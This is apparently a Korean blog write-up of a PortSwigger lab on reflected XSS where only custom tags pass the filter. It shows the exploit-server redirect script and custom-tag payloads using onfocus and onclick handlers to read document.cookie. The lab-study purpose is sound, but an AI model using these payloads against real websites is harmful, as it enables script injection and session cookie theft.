custom tag 외에 모두 필터링 한다
<script>
location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>
https://your-lab-id.web-security-academy.net/?search=<xss id=x onfocus=alert(document.cookie) tabindex=1>#x
풀이가 이런 이유는 victim이 /exploit 링크를 클릭했을 때 익스되도록 만들기 위함인 듯 하다...
?search= 입력하는 곳에
<xss onclick=alert(document.cookie)>asdf</xss>
를 입력해도 된다.
'정보보안 > 웹해킹' 카테고리의 다른 글
| HttpOnly Cookie & Secure Cookie (0) | 2021.10.22 |
|---|---|
| [PortSwigger] Reflected XSS into HTML context with most tags and attributes blocked (0) | 2021.10.18 |
| [PortSwigger] CSRF where token is tied to non-session cookie (0) | 2021.10.17 |
| [PortSwigger] CSRF where token is not tied to user session (0) | 2021.10.16 |
| [PortSwigger] CSRF where token validation depends on token being present (0) | 2021.10.16 |
댓글